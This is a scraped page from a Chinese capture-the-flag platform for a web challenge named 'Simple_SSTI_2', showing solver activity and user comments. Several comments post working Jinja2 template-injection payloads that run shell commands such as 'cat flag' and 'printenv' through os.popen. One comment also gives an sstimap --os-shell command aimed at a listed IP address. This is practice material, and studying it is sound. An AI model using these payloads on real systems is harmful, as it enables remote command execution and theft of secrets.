Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16378
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
kiritoldws 攻破了该题 4小时前
evilk 攻破了该题 13小时前
等往事风中吹‘ 攻破了该题 1天前
muerjing 攻破了该题 2天前
wes 攻破了该题 4天前
kangwendong 攻破了该题 4天前
ctfcaiji9527 攻破了该题 5天前
WindZQ 攻破了该题 5天前
2kniden 攻破了该题 6天前
李逍遥逛霍格沃茨 攻破了该题 7天前
SkyAsh 攻破了该题 8天前
seyana 攻破了该题 11天前
Niko_83c 攻破了该题 11天前
陌兮li 攻破了该题 11天前
南京交通第一深情徐立超 攻破了该题 11天前
123jiji 攻破了该题 12天前
Moon172332 攻破了该题 13天前
你好999你好 攻破了该题 13天前
守夜人 攻破了该题 13天前
评论
网恋秀牛子被录屏导致自卑 1月前
举报
/?flag={{(OvO.__eq__.__globals__.sys.modules.os.popen('cat flag')).read()}}
liutong27 4月前
举报
python3 sstimap.py -u http://117.72.52.127:12369/?flag=1 --os-shell
wywitkey 7月前
举报
前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell
HK1ng 9月前
举报
详解:https://blog.csdn.net/m0_59527104/article/details/147013776
smtall 10月前
举报
flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}
hao7 1年前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}
超爱西西鸭 1年前
举报
/?flag={{config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
pettter 1年前
举报
?id={{config.__class__.__init__.__globals__['os'].popen('printenv').read()}}
不会写代码的菜鸟 1年前
举报
大佬们,为啥不能直接flag={{os.popen('cat ../app/flag').read()}}还需要加上那么多前缀
qingchuan 1年前
举报
因为没有import os,os是未定义的
q1152874733 1年前
举报
http://114.67.175.224:11052/?flag={{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag').read()")}}